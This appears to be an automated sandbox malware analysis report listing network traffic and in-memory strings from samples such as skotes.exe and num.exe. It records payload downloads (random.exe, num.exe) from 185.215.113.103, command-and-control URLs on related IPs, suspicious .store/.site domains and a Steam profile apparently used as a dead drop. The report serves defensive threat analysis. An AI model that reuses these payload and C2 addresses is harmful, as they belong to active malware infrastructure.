                                Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
                                Source: global trafficHTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728337199.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/ equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2443a078f918f5d8bd5d4d5b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25489Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 07 Oct 2024 01:23:44 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=52d65d3cb3170de9b0432222; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 07 Oct 2024 01:23:22 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                                Source: chromecache_161.19.drString found in binary or memory: _.iq(p)+"/familylink/privacy/notice/embedded?langCountry="+_.iq(p);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.iq(m);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.iq(_.rq(c))+"&hl="+_.iq(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.iq(m)+"/chromebook/termsofservice.html?languageCode="+_.iq(d)+"&regionCode="+_.iq(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded": equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ttps://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ 0 equals www.youtube.com (Youtube)
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: youtube.com
                                Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                                Source: global trafficDNS traffic detected: DNS query: www.google.com
                                Source: global trafficDNS traffic detected: DNS query: clearancek.site
                                Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
                                Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
                                Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
                                Source: global trafficDNS traffic detected: DNS query: studennotediw.store
                                Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
                                Source: global trafficDNS traffic detected: DNS query: spirittunek.store
                                Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
                                Source: global trafficDNS traffic detected: DNS query: accounts.youtube.com
                                Source: global trafficDNS traffic detected: DNS query: play.google.com
                                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/luma/random.exe
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/luma/random.exex6
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/test/num.exe
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/well/random.exe
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/well/random.exe/~
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/well/random.exe13
                                Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                                Source: num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/9aqo
                                Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/=
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/LaJo
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000002C.00000002.2630021156.00000000005E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                                Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGQ
                                Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJXi
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpKQ
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpoQ
                                Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu
                                Source: num.exe, 00000014.00000002.2442698783.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                                Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpzX
                                Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                                Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37E
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/15.113.43/ows
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Local
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid2=
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2953123746.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$AC
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0332001
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0349001
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8AO
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=.Verb
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/a
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/fac00b58981f4a4fea1c67edd534db057eb410a494d9d#b
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/ones
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
